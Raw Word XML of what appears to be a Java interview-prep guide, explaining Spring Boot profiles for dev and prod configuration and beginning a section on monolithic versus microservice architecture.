    <w:p w14:paraId="15F1CEAB" w14:textId="3D01263C" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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B52A7EE">
          <v:rect id="_x0000_i2745" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="000B205F" w14:textId="00A9D3B6" w:rsidR="0047308B" w:rsidRPr="00CE4B95" w:rsidRDefault="0047308B" w:rsidP="0047308B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="668" w:name="_Toc196308148"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How do you configure multiple environments (dev, prod)?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="668"/>
    </w:p>
    <w:p w14:paraId="2DC60194" w14:textId="3BF3750B" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In Spring Boot, you can configure multiple environments (e.g., dev, prod, test, etc.) by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Spring profiles allow you to separate the configuration for different environments, so that you can have specific configurations for each environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2037643B"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Steps to Configure Multiple Environments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D00A1"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1. Define Profiles in application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DDE81E"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You can define environment-specific configurations in separate application-{profile}.properties or application-{profile}.yml files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1EB99D"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Example with application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC39978"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Default Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for common properties):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E37DD7"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application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F74A7"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spring.application.name=my-application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430AF273"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server.port=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16040012"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Development Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283614C"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application-dev.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75386145"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spring.datasource.url=jdbc:mysql://localhost:3306/devdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF88AE8"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spring.datasource.username=devuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF59D0D"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spring.datasource.password=devpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C96F375"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Production Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0606B389"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application-prod.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A22550D"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spring.datasource.url=jdbc:mysql://prod-db-server:3306/proddb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2225BC1A"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spring.datasource.username=produser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADE5E6"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spring.datasource.password=prodpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565961B9"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2. Use @Profile Annotation in Java Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E06E6C0"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You can use the @Profile annotation on beans to specify which profile they belong to. This allows you to create beans that are only loaded in certain environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF26D9"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B12172C"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F9946"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Profile("dev")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0177E54E"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public class DevConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA490C3" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17528839"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5440A9A1"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public DataSource dataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB864CC"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 Development specific datasource configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFFC1BE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B89BD8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F9731" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9817F4"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DBCDB9"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Profile("prod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58700321"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public class ProdConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C34E96B" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EBA54E"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F318FB5"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public DataSource dataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B62DBA8"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 Production specific datasource configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A91B21F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B0CED"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDBCCBE"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3. Activate a Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A7D65"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You can activate a profile in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB98CDE"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Via Command Line</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Add --spring.profiles.active=dev (or prod) when running your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E002E"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6039D540"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java -jar my-application.jar --spring.profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6F1DC"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Via application.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can specify the active profile directly in your application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76695731"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4242DD93"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application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B241A"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lastRenderedPageBreak/>
        <w:t>spring.profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4A8CC"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Via Environment Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C9286"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export SPRING_PROFILES_ACTIVE=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFDCE2F"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Via @SpringBootApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can also set the active profile using the @SpringBootApplication annotation by specifying it in the main() method or through a @Configuration class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDBC10E"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4. Using Profile-Specific Configuration Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A2A13"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Spring Boot will automatically load the correct profile-specific configuration file based on the active profile. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7CFBA3"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application-dev.properties for the dev profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE62CC"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application-prod.properties for the prod profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB109FF"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You can also use YAML files (application-dev.yml, application-prod.yml) if you prefer YAML configuration format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED945F7"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Example with YAML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205DF5C4"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application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAA1C5F"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spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F3CE1"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profiles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9F71CE"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active: dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DDE586" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BAF88F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A396628"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application-dev.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1710D7C3"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spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C321566"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datasource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286BE7C9"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url: jdbc:mysql://localhost:3306/devdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7DC11"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username: devuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B24E0C"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password: devpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B68DBFC" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CBF9CF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C4968"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application-prod.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438F8AA"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spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A88273"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datasource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A156D0"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url: jdbc:mysql://prod-db-server:3306/proddb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C25A7"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username: produser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D6B6F"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    password: prodpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F4D27"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5. Different Profiles for Different Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1FA41E"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You can also use profiles to load environment-specific configurations for services like databases, logging, security, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E7C94D"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04223D82"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Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dev profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for development configurations with lower security, debug-level logging, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E4FFC"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 xml:space="preserve">Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prod profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for production configurations with stronger security, production-level logging, and performance tuning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F5362"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6. Override Properties with Command-Line Arguments or @Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDEB276"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You can override properties at runtime by passing command-line arguments or using @Value in your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63714D3B"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Example of using @Value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CACADB9"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Value("${spring.datasource.url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57914B27"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private String datasourceUrl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCF2CD"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You can then override this property by passing a command-line argument like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FBA84C"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java -jar my-application.jar --spring.datasource.url=jdbc:mysql://new-database-url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E742EF9" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3AC53F"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Use Profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Define environment-specific configurations in application-{profile}.properties or application-{profile}.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BADE3F7"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Activate Profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Activate the profile using --spring.profiles.active, environment variables, or configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F7205"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Use @Profile Annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use the @Profile annotation on beans to load them only in specific profiles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095E3E3" w14:textId="77777777" w:rsidR="00EF2E21"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Override Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Override properties at runtime using command-line arguments or @Value injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EF89ED" w14:textId="307A37FC" w:rsidR="00132306" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By using Spring Boot profiles, you can easily manage environment-specific configurations and ensure the correct setup for different environments like dev, test, and prod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDFA45A" w14:textId="44CB45C5" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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AB109A2">
          <v:rect id="_x0000_i2746" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8DEB2E" w14:textId="15C70DB5" w:rsidR="00DD6512" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6512" w:rsidP="00DD6512">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="669" w:name="_Toc196308149"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Microservices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="669"/>
    </w:p>
    <w:p w14:paraId="0994D3C6" w14:textId="77777777" w:rsidR="004B0E1A" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0E1A" w:rsidP="004B0E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EEE38CE" w14:textId="3A5E2A09" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD291C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="670" w:name="_Toc196308150"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Monolith</w:t>
      </w:r>
      <w:r w:rsidR="004728CC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ic</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microservices and when to choose which?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="670"/>
    </w:p>
    <w:p w14:paraId="640602A9" w14:textId="55C9E744" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00615C7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B11F59A" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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Monolithic Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0802F0" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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at is it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D65A3E7"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single unified application where all modules (UI, business logic, data access) are tightly coupled and deployed together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4DB248" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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haracteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD3413" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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gle codebase and deployment unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F836E0E" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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l features share the same memory space and process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6021EEEC" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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sy to develop initially and suitable for small teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D7AA6E" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00146B8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9C68CA6">
          <v:rect id="_x0000_i2747" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1F782" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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Microservices Architecture</w:t>
      </w:r>
    </w:p>
